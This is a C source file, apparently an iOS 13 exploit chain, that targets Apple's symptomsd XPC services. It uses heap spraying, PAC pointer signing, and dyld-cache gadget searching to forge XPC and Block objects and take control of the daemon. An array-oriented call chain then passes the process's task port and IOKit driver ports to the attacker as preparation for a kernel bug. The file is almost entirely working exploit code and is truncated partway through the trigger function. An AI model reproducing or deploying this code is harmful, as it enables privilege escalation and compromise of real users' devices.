// for spray\n uint32_t dispatchData_len = 0x20000;\n void *dispatchData = malloc(dispatchData_len);\n bzero(dispatchData, dispatchData_len);\n \n for(int i=0; i\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include // For PAC-device(arm64e) support\n#include \"IOKitLib.h\"\n#include \"xpc.h\"\n\nextern kern_return_t bootstrap_look_up(mach_port_t bp, const char *service_name, mach_port_t *sp);\n\n#pragma pack(4)\n\n#define SPRAY_ADDRESS 0x150010000\n\n#define TARGET_MACH_SERVICE \"com.apple.usymptomsd\"\n#define TARGET_MACH_SERVICE_2 \"com.apple.symptoms.symptomsd.managed_events\"\n\n#define OF(offset) (offset)/sizeof(uint64_t)\n#define exit(X) longjmp(jmpb, 1)\n\njmp_buf jmpb;\n\nuint64_t PACSupport_pacdza(uint64_t data_ptr){\n \n const char *unused_fmt = \"\";\n printf(unused_fmt, data_ptr);\n __asm__ __volatile__(\"mov %0, x8\"\n ::\"r\"(data_ptr));\n __asm__ __volatile__(\n \"pacdza x8\\n\"\n \"mov %0, x8\\n\"\n :\"=r\"(data_ptr));\n return data_ptr;\n}\n\nuint64_t PACSupport_paciza(uint64_t code_ptr){\n \n const char *unused_fmt = \"\";\n printf(unused_fmt, code_ptr);\n __asm__ __volatile__(\"mov %0, x8\"\n ::\"r\"(code_ptr));\n __asm__ __volatile__(\n \"paciza x8\\n\"\n \"mov %0, x8\\n\"\n :\"=r\"(code_ptr));\n return code_ptr;\n}\n\nuint64_t PACSupport_pacia(uint64_t code_ptr, uint64_t modifier){\n \n __asm__ __volatile__(\n \"pacia x0, x1\\n\"\n \"mov x18, x0\\n\"\n \"mov %0, x18\\n\"\n :\"=r\"(code_ptr));\n return code_ptr;\n}\n\nuint64_t PACSupport_xpaci(void *code_ptr){\n return (uint64_t)ptrauth_strip(code_ptr, ptrauth_key_asia);\n}\n\nuint64_t PACSupport_addMask(uint64_t data_ptr, uint32_t mask){\n \n /*\n Commonly used in cooperate with \"blraa\"\n \n 0000000190e0db00 ldraa x9, [x8, #0x10]!\n 0000000190e0db04 movk x8, #0x165d, lsl #48\n 0000000190e0db08 blraa x9, x8\n */\n \n data_ptr |= (((uint64_t)mask) << 48);\n return data_ptr;\n}\n\n#pragma mark AOP Gadgets\n// AOP: Array Oriented Programming\n\nvoid *dylibcache_start = NULL;\nsize_t dylibcache_size = 0;\n\nbool isPartOf_dyldcache(vm_address_t addr){\n vm_size_t size = 0;\n natural_t depth = 0;\n vm_region_submap_info_data_64_t info;\n mach_msg_type_number_t info_cnt = VM_REGION_SUBMAP_INFO_COUNT_64;\n if(vm_region_recurse_64(mach_task_self(), &addr, &size, &depth, (vm_region_info_t)&info, &info_cnt))\n return false;\n if(info.share_mode == SM_TRUESHARED)\n return true;\n return false;\n}\n\nsize_t Get_loaded_dylib_size(void *dylib_address){\n struct mach_header *mh = (struct mach_header*)dylib_address;\n const uint32_t cmd_count = mh->ncmds;\n struct load_command *cmds = (struct load_command*)((char*)mh+sizeof(struct mach_header_64));\n struct load_command* cmd = cmds;\n for (uint32_t i = 0; i < cmd_count; ++i){\n switch (cmd->cmd) {\n case LC_SEGMENT_64:{\n struct segment_command_64 *seg = (struct segment_command_64*)cmd;\n if(!strcmp(seg->segname,\"__TEXT\")){\n return seg->vmsize;\n }\n }\n break;\n }\n cmd = (struct load_command*)((char*)cmd + cmd->cmdsize);\n }\n return 0;\n}\n\nvoid Find_dylibcache(){\n \n vm_address_t minAddr = 0;\n vm_address_t maxAddr = 0;\n \n for (uint32_t i = 0; i < _dyld_image_count(); i++){\n uint64_t addr = (uint64_t)_dyld_get_image_header(i);\n const char *name = _dyld_get_image_name(i);\n if(strncmp(name, \"/System/\", 8) && strncmp(name, \"/usr/\", 5))\n continue;\n if(!isPartOf_dyldcache(addr))\n continue;\n if(!minAddr || addr < minAddr)\n minAddr = addr;\n if(addr > maxAddr)\n maxAddr = addr;\n }\n \n if(!minAddr||!maxAddr){\n printf(\"dylibcache Not Ready!\\n\");\n exit();\n }\n \n size_t last_dylib_size = Get_loaded_dylib_size((void*)maxAddr);\n \n dylibcache_start = (void*)minAddr;\n dylibcache_size = (size_t)((maxAddr + last_dylib_size) - minAddr);\n \n printf(\"Dylibcache range: %p - %p\\n\", dylibcache_start, dylibcache_start + dylibcache_size);\n}\n\nuint64_t find_gadget(char *bytes, size_t len){\n void *addr = memmem(dylibcache_start, dylibcache_size, bytes, len);\n if(!addr){\n printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n }\n return (uint64_t)addr;\n}\n\nuint64_t find_gadget_speed(char *bytes, size_t len, void *findingRange_start, uint64_t findingRange_size){\n void *addr = memmem(findingRange_start, findingRange_size, bytes, len);\n if(!addr){\n //printf(\"Gadget didn't find, len:0x%zx\\n\",len);\n }\n return (uint64_t)addr;\n}\n\nchar _bytes_dualJump_ios12[] = {\n 0x08, 0x00, 0x40, 0xF9, // ldr x8, [x0]\n 0x09, 0x3D, 0x20, 0xF8, // ldraa x9, [x8, #0x18]!\n 0x48, 0x15, 0xEE, 0xF2, // movk x8, #0x70aa, lsl #48\n 0x28, 0x09, 0x3F, 0xD7, // blraa x9, x8\n 0x08, 0x00, 0x40, 0xF9, // ldr x8, [x0]\n 0xE8, 0x3B, 0xC1, 0xDA, // autdza x8\n 0x09, 0x01, 0x40, 0xF9, // ldr x9, [x8]\n 0xA8, 0x39, 0xFF, 0xF2, // movk x8, #0xf9cd, lsl #48\n 0x28, 0x09, 0x3F, 0xD7, // blraa x9, x8\n};\nchar _bytes_dualJump_ios13[] = {\n 0x08, 0x00, 0x40, 0xF9, // ldr x8, [x0]\n 0x09, 0x3D, 0x20, 0xF8, // ldraa x9, [x8, #0x18]!\n 0x48, 0x92, 0xFA, 0xF2, // movk x8, #0xd492, lsl #48\n 0x28, 0x09, 0x3F, 0xD7, // blraa x9, x8\n 0x08, 0x00, 0x40, 0xF9, // ldr x8, [x0]\n 0x09, 0x0D, 0x20, 0xF8, // ldraa x9, [x8, #0x0]!\n 0xA8, 0x39, 0xFF, 0xF2, // movk x8, #0xf9cd, lsl #48\n 0x28, 0x09, 0x3F, 0xD7, // blraa x9, x8\n};\n#define _Gadget_dualJump find_gadget(_bytes_dualJump_ios13,sizeof(_bytes_dualJump_ios13))\nuint64_t Gadget_dualJump = 0;\n\n// ldr x0, [x0] ; xpacd x0 ; ret\n#define _Gadget_strip_x0 find_gadget((char[]){0x00,0x00,0x40,0xF9,0xE0,0x47,0xC1,0xDA,0xC0,0x03,0x5F,0xD6},12)\nuint64_t Gadget_strip_x0 = 0;\n\nchar _bytes_control_x0x2[] = {\n 0xF3, 0x03, 0x00, 0xAA, // mov x19, x0\n 0x08, 0x00, 0x42, 0xA9, // ldp x8, x0, [x0, #0x20]\n 0x61, 0x3A, 0x40, 0xB9, // ldr w1, [x19, #0x38]\n 0x62, 0x1A, 0x40, 0xF9, // ldr x2, [x19, #0x30]\n 0x1F, 0x09, 0x3F, 0xD6, // blraaz x8\n};\n#define _Gadget_control_x0x2 find_gadget_speed(_bytes_control_x0x2,sizeof(_bytes_control_x0x2),findingRange_start,findingRange_size)\nuint64_t Gadget_control_x0x2 = 0;\n\nchar _bytes_memcopy[] = {\n 0x08, 0x00, 0x40, 0xB9, // ldr w8, [x0]\n 0x68, 0x00, 0x00, 0xB9, // str w8, [x3]\n 0xC0, 0x03, 0x5F, 0xD6, // ret\n};\n#define _Gadget_memcopy find_gadget_speed(_bytes_memcopy,sizeof(_bytes_memcopy),findingRange_start,findingRange_size)\nuint64_t Gadget_memcopy = 0;\n\n#define aop_FuncCALL(FUNC, ARG1, ARG2, ARG3, ARG4) \\\nspraymem[OF(_aop_FuncCALL_primer_offset)] = spray_start_address + _aop_FuncCALL_offset; \\\n{char *func_call_payload = ((char*)spraymem) + _aop_FuncCALL_offset; \\\n_aop_FuncCALL_primer_offset += 8; \\\n_aop_FuncCALL_offset += 0x74; \\\n*(uint32_t*)(func_call_payload + 20) = 53; \\\n*(uint64_t*)(func_call_payload) = 0; \\\n*(uint32_t*)(func_call_payload + 8) = 0; \\\nchar *tmp_ha = func_call_payload + 24; /* Saved an offset later gonna involves multiple time */ \\\n*(uint32_t*)(tmp_ha + 4) = 150; \\\n*(uint32_t*)(func_call_payload + 4) = 116; \\\n*(uint64_t*)(tmp_ha + 16) = PACSupport_paciza(PACSupport_xpaci(FUNC)); /* func ptr */ \\\n*(uint64_t*)(tmp_ha + 24) = ARG1; /* arg1 */ \\\n*(uint32_t*)(tmp_ha + 72) = ARG2; /* arg2 (Only 32bits)*/ \\\n*(uint64_t*)(tmp_ha + 76) = ARG3; /* arg3 */ \\\n*(uint64_t*)(tmp_ha + 84) = ARG4;} // arg4\n\n#define aop_FuncCALL_memcpy_32bits(dst, src) \\\naop_FuncCALL((void*)Gadget_memcopy, src, 0, 0, dst)\n\n#define aop_Insert_String(VAR, STR) \\\nsize_t _##VAR##_len = strlen(STR) + 1; \\\nuint64_t VAR = SPRAY_ADDRESS + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, STR, _##VAR##_len); \\\n_##VAR##_len = (~0xF) & (_##VAR##_len + 0xF); \\\n_aop_data_offset += _##VAR##_len;\n\n#define aop_Insert_Data(VAR, DATA, SIZE) \\\nsize_t _##VAR##_SIZE = SIZE; \\\nuint64_t VAR = SPRAY_ADDRESS + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, DATA, _##VAR##_SIZE); \\\n_##VAR##_SIZE = (~0xF) & (_##VAR##_SIZE + 0xF); \\\n_aop_data_offset += _##VAR##_SIZE;\n\nvoid Find_aopGadgets(){\n \n#define _SEEK(V) if(!(V = _##V)){printf(\"No \"#V\" Found!\\n\");exit();}\n \n //_SEEK(Gadget_dualJump); Unused\n //_SEEK(Gadget_strip_x0); Unused\n //_SEEK(Gadget_control_x0x2); Switch to speed version\n //_SEEK(Gadget_memcopy); Switch to speed version\n\n}\n\n/*void Find_aopGadgets_speed(){\n \n const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n const char *target_lib_2 = \"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n \n dlopen(target_lib_1, RTLD_NOW);\n dlopen(target_lib_2, RTLD_NOW);\n \n for (uint32_t i = 0; i < _dyld_image_count(); i++){\n \n const char *name = _dyld_get_image_name(i);\n if(!strcmp(name, target_lib_1)){\n \n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n _SEEK(Gadget_control_x0x2);\n }\n else if(!strcmp(name, target_lib_2)){\n \n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n _SEEK(Gadget_memcopy);\n }\n }\n}\n*/\n\n void Find_aopGadgets_speed(){\n \n const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n const char *target_lib_2 = \"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n \n dlopen(target_lib_1, RTLD_NOW);\n dlopen(target_lib_2, RTLD_NOW);\n \n for (uint32_t i = 0; i < _dyld_image_count(); i++){\n \n {\n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n if(!Gadget_control_x0x2)\n Gadget_control_x0x2 = _Gadget_control_x0x2;\n }\n {\n void *findingRange_start = (void*)_dyld_get_image_header(i);\n uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n if(!Gadget_memcopy)\n Gadget_memcopy = _Gadget_memcopy;\n }\n }\n if(!Gadget_control_x0x2){\n printf(\"Error: Gadget_control_x0x2 not found!\\n\"); sleep(999);\n }\n if(!Gadget_memcopy){\n printf(\"Error: Gadget_memcopy not found!\\n\"); sleep(999);\n }\n}\n\n// Look up service: com.apple.usymptomsd\nuint8_t bootstrap_look_up_machmsg_bytes[244] = {0x13,0x15,0x13,0x0,0xf4,0x0,0x0,0x0,0x7,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x43,0x50,0x58,0x40,0x5,0x0,0x0,0x0,0x0,0xf0,0x0,0x0,0xcc,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x73,0x75,0x62,0x73,0x79,0x73,0x74,0x65,0x6d,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x68,0x61,0x6e,0x64,0x6c,0x65,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x69,0x6e,0x73,0x74,0x61,0x6e,0x63,0x65,0x0,0x0,0x0,0x0,0x0,0xa0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x72,0x6f,0x75,0x74,0x69,0x6e,0x65,0x0,0x0,0x40,0x0,0x0,0xcf,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x66,0x6c,0x61,0x67,0x73,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6e,0x61,0x6d,0x65,0x0,0x0,0x0,0x0,0x0,0x90,0x0,0x0,0x15,0x0,0x0,0x0,0x63,0x6f,0x6d,0x2e,0x61,0x70,0x70,0x6c,0x65,0x2e,0x75,0x73,0x79,0x6d,0x70,0x74,0x6f,0x6d,0x73,0x64,0x0,0x0,0x0,0x0,0x74,0x79,0x70,0x65,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x61,0x72,0x67,0x65,0x74,0x70,0x69,0x64,0x0,0x0,0x0,0x0,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nuint8_t vm_remap_machmsg_bytes[92] = {0x13,0x15,0x0,0x80,0x5c,0x0,0x0,0x0,0x11,0x11,0x11,0x11,0x22,0x22,0x22,0x22,0x0,0x0,0x0,0x0,0xcd,0x12,0x0,0x0,0x1,0x0,0x0,0x0,0x3,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x13,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x33,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xf,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x40,0x0,0x0,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nvoid Assemble_AOP(uint64_t *aop_stack, uint64_t rop_start_address){\n \n extern void get_string(char *copyto); // copy a fake string\n get_string(aop_stack);\n}\n\nvoid Assemble_AOP2(uint64_t *spraymem, uint64_t spray_start_address){\n \n // Trigger vuln causing call objc_release with fake_xpcobj\n char *fake_xpcobj = (char*)spraymem;\n *(uint64_t*)fake_xpcobj = (uint64_t)dlsym((void*)-2, \"_xpc_type_file_transfer\");\n *(uint32_t*)(fake_xpcobj + 0xC) = 0; // set retainCnt as 0, leads to _xpc_file_transfer_dispose\n *(uint64_t*)(fake_xpcobj + 0x40) = spray_start_address + 0x48; // leads to _Block_release during disposal\n \n char *fake_Block = ((char*)spraymem) + 0x48;\n char *fake_Block_core = fake_Block + 0x40;\n \n *(uint32_t*)(fake_Block + 0x8) = 0x3000000 | 0x2; // Necessary bits mask | retainCnt\n *(uint64_t*)(fake_Block + 0x18) = (uint64_t)spray_start_address + 0x48 + 0x40;\n \n // First place got control of PC\n *(uint64_t*)(fake_Block_core + 0x18) = PACSupport_pacia(Gadget_control_x0x2, (uint64_t)spray_start_address + 0x48 + 0x40 + 0x18);\n \n // --- Execute control_x0x2 gadget\n *(uint64_t*)(fake_Block + 0x20) = PACSupport_paciza(PACSupport_xpaci(dlsym((void*)-2, \"xpc_array_apply_f\"))); // Next jmp\n *(uint64_t*)(fake_Block + 0x28) = spray_start_address + 0x100 - 24; // Reset x0, point to our spray mem, explicitly, a crafted xpc array\n *(uint64_t*)(fake_Block + 0x30) = (uint64_t)IODispatchCalloutFromMessage; // Reset x2\n *(uint64_t*)(fake_Block + 0x38) = 0x0; // Reset w1 (Only 32bit)\n \n /*\n Begin Array-Oriented-Programming function chain-calling\n \n Payload arrangement:\n \n 0x0\n ... Used during taking control of PC\n 0x100\n ... AOP array object itself\n 0x118\n ... For AOP data-use\n 0x1500\n ... For AOP call-use\n 0x3E00\n ... AOP array storage\n 0x4000\n */\n \n uint32_t _aop_FuncCALL_primer_offset = 0x3E00;\n uint32_t _aop_FuncCALL_offset = 0x1800;\n uint32_t _aop_data_offset = 0x118; // offset is right after fake array\n \n // Craft a fake array, stru has changed and req size increased to 0x18 since iOS13, was 0x10\n spraymem[OF(0x100)] = spray_start_address + _aop_FuncCALL_primer_offset; // Array internal pointer, point to stored objects pool\n spraymem[OF(0x108)] = -1; // Array count, -1 causes the array to iterate endlessly -1\n spraymem[OF(0x110)] = 0; // new value introd since iOS13, keep it empty\n \n // --- Following are AOP data-use\n \n aop_Insert_Data(lookup_io_server_rawmsg, bootstrap_look_up_machmsg_bytes, sizeof(bootstrap_look_up_machmsg_bytes));\n *(uint64_t*)(vm_remap_machmsg_bytes + 56) = 0x4000000; // 0x4000000 //0x30000; // size of iosurface\n aop_Insert_Data(vm_remap_rawmsg, vm_remap_machmsg_bytes, sizeof(vm_remap_machmsg_bytes));\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n mach_msg_body_t msgh_body;\n mach_msg_port_descriptor_t our_recv_port;\n // our_recv_port.name: +28\n mach_msg_port_descriptor_t our_task_port;\n // our_task_port.name: +40\n mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n // IOSurfaceRoot_servport.name: +52\n mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n // AppleAVE2Driver_servport.name: +64\n mach_msg_trailer_t trailer;\n }_remote_recvmsg = {0}; // Size: 84\n _remote_recvmsg.Head.msgh_size = sizeof(_remote_recvmsg);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n mach_msg_trailer_t trailer;\n }_remote_recvmsg2 = {0}; // Size: 32\n _remote_recvmsg2.Head.msgh_size = sizeof(_remote_recvmsg2);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_local_port: +12\n uint64_t remote_map_addr;\n // remote_map_addr: +24\n mach_msg_trailer_t trailer;\n }_remote_recvmsg3 = {0}; // Size: 56\n _remote_recvmsg3.Head.msgh_size = sizeof(_remote_recvmsg3);\n \n struct {\n mach_msg_header_t Head;\n // Head.msgh_remote_port +8\n mach_msg_body_t msgh_body;\n mach_msg_port_descriptor_t port_send_to_us;\n // port_send_to_us.name +28\n }_remote_sendmsg = {0};\n _remote_sendmsg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg.Head.msgh_size = sizeof(_remote_sendmsg);\n _remote_sendmsg.msgh_body.msgh_descriptor_count = 1;\n _remote_sendmsg.port_send_to_us.name = mach_task_self();\n _remote_sendmsg.port_send_to_us.disposition = MACH_MSG_TYPE_MOVE_SEND;\n _remote_sendmsg.port_send_to_us.type = MACH_MSG_PORT_DESCRIPTOR;\n \n struct {\n mach_msg_header_t Head;\n }_remote_sendmsg2 = {0};\n _remote_sendmsg2.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg2.Head.msgh_size = sizeof(_remote_sendmsg2);\n \n struct {\n mach_msg_header_t Head;\n uint64_t send_remap_addr_to_us;\n // send_remap_addr_to_us: +24\n }_remote_sendmsg3 = {0};\n _remote_sendmsg3.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n _remote_sendmsg3.Head.msgh_size = sizeof(_remote_sendmsg3);\n \n aop_Insert_Data(remote_recvmsg, &_remote_recvmsg, sizeof(_remote_recvmsg));\n aop_Insert_Data(remote_recvmsg2, &_remote_recvmsg2, sizeof(_remote_recvmsg2));\n aop_Insert_Data(remote_recvmsg3, &_remote_recvmsg3, sizeof(_remote_recvmsg3));\n aop_Insert_Data(remote_sendmsg, &_remote_sendmsg, sizeof(_remote_sendmsg));\n aop_Insert_Data(remote_sendmsg2, &_remote_sendmsg2, sizeof(_remote_sendmsg2));\n aop_Insert_Data(remote_sendmsg3, &_remote_sendmsg3, sizeof(_remote_sendmsg3));\n \n // --- Following are AOP code-use\n \n // Call bootstrap_look_up to retri listening port\n aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, lookup_io_server_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n aop_FuncCALL(mach_msg_send, lookup_io_server_rawmsg, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, lookup_io_server_rawmsg, 0, 0, 0);\n \n aop_FuncCALL_memcpy_32bits(remote_recvmsg + offsetof(mach_msg_header_t, msgh_local_port), lookup_io_server_rawmsg + 28);\n aop_FuncCALL(mach_msg_receive, remote_recvmsg, 0, 0, 0);\n aop_FuncCALL_memcpy_32bits(remote_recvmsg2+12, remote_recvmsg+12);\n aop_FuncCALL_memcpy_32bits(remote_recvmsg3+12, remote_recvmsg+12);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg+8, remote_recvmsg+28);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg2+8, remote_recvmsg+28);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+8, remote_recvmsg+28);\n \n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+8, remote_recvmsg+40);\n aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, vm_remap_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n \n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0); // To inform us that pwned proc got the msg contains our port\n \n // Then passing own task port to us\n aop_FuncCALL(mach_msg_send, remote_sendmsg, 0, 0, 0);\n /*\n Reason of doing this, instead like in iOS12 exploit, open IO service port via IOServiceOpen and passing to us directly.\n iOS 13 added new mitigation prevent all IOUserClient (obtain via IOServiceOpen) port from moving to other ipc space, namely diff tasks.\n \n I supposed these port are marked as guarded port.\n \n Example crash:\n Exception Type: EXC_GUARD\n Exception Subtype: GUARD_TYPE_MACH_PORT\n Exception Message: on mach port 84999 (guarded with 0x0000000000000000)\n Exception Note: SIMULATED (this is NOT a crash)\n \n Way to get around this is \"passively\" passing to us, like use task_get_special_port/task_set_special_port trick\n */\n \n // Opening and passing kernel driver ports to us.\n aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+52);\n aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n \n aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_SEATBELT_PORT, 0x414141, 0);\n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0); // Waiting for us to notify pwned proc we got the port\n \n aop_FuncCALL_memcpy_32bits(SPRAY_ADDRESS + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+64);\n aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n \n aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_ACCESS_PORT, 0x414141, 0);\n aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n \n // Waiting for overwriting over the iosurface mapping memory, key to trigger vulnerability in kernel\n aop_FuncCALL(mach_msg_receive, remote_recvmsg3, 0, 0, 0);\n \n // Perform cross-task memory mapping\n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+76, remote_recvmsg3+24);\n aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+80, remote_recvmsg3+28); // src addr which is the remote mapping addr\n aop_FuncCALL(mach_msg_send, vm_remap_rawmsg, 0, 0, 0);\n aop_FuncCALL(mach_msg_receive, vm_remap_rawmsg, 0, 0, 0);\n \n // send remap addr to us\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+24, vm_remap_rawmsg+36);\n aop_FuncCALL_memcpy_32bits(remote_sendmsg3+28, vm_remap_rawmsg+40); // src addr which is the remote mapping addr\n aop_FuncCALL(mach_msg_send, remote_sendmsg3, 0, 0, 0);\n \n // Block here to waiting for finish exploitation\n aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0);\n \n // Duty completed\n aop_FuncCALL(exit, 0, 0, 0, 0);\n \n //printf(\"_aop_data_offset: 0x%x\\n\", _aop_data_offset);\n //printf(\"_aop_FuncCALL_offset: 0x%x\\n\", _aop_FuncCALL_offset);\n //printf(\"_aop_FuncCALL_primer_offset: 0x%x\\n\", _aop_FuncCALL_primer_offset);\n}\n\nvoid symptomsd_vuln_prepare1(){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n });\n xpc_connection_resume(xpcconn);\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2: read_and_set_config, case 3: read_config\n \n xpc_object_t config_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(msg, \"config\", config_arr);\n \n xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0);\n // Parse by -[ConfigurationHandler read:returnedValues:]\n xpc_array_append_value(config_arr, each_config);\n \n xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"com.apple.symptoms.test.request-passthrough\"); // [knownItems objectForKey: ???]\n \n xpc_object_t signature_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(each_config, \"TRIGGERED_SIGNATURES\", signature_arr); // Enter -[SimpleSymptomEvaluator configureInstance:]\n \n xpc_object_t each_signature = xpc_dictionary_create(NULL, NULL, 0);\n xpc_array_append_value(signature_arr, each_signature);\n \n xpc_dictionary_set_string(each_signature, \"SIGNATURE_NAME\", \"HAHA\");\n \n xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_GENERATOR\", \"CertificateErrors\"); //CertificateErrors\n xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_SELECTOR\", \"conditionMinCount\"); //additionalSelector\n \n xpc_dictionary_set_string(each_signature, \"SYNDROME_NAME\", \"new_HAHA2\"); // must set\n xpc_dictionary_set_int64(each_signature, \"RULE_AWD_CODE\", 7);\n \n // -[SimpleSyndromeHandler configureInstance:]\n xpc_dictionary_set_int64(each_signature, \"SYNDROME_DAMPENING_INTERVAL\", 0); // SimpleSyndromeHandler->_dampeningInterval\n xpc_dictionary_set_string(each_signature, \"SYNDROME_HANDLER\", \"ManagedEventHandler\"); // ??? getHandlerByName:\n \n \n xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n });\n}\n\nvoid symptomsd_vuln_prepare2(int boo){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n });\n xpc_connection_resume(xpcconn);\n \n xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n \n xpc_object_t config_arr = xpc_array_create(NULL, 0);\n xpc_dictionary_set_value(msg, \"config\", config_arr);\n \n xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0); // Parse by -[ConfigurationHandler read:returnedValues:]\n xpc_array_append_value(config_arr, each_config);\n \n xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"CertificateErrors\"); // [knownItems objectForKey: CertificateErrors]\n \n if(boo){\n xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"5637210112\"); // Turn SPRAY_ADDRESS to Decimal\n }\n else{\n xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"0\"); // 0x150010110 (5637210384) | crash: 22817079568\n }\n\n xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n });\n}\n\nvoid symptomsd_vuln_trigger(int boo){\n \n xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n //printf(\"replyA\\n\");\n //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n //printf(\"erra: %s\\n\", err);\n });\n xpc_connection_resume(xpcconn);\n \n size_t payload_size = 8 + 72 + 100 + 6; // payload head + 1st tlv length + 1st tlv body + beginning of 2nd tlv (To break the loop)\n char *payload = malloc(payload_size);\n bzero(payload, payload_size);\n \n *(uint16_t*)payload = 2; // case ? for switch statement\n 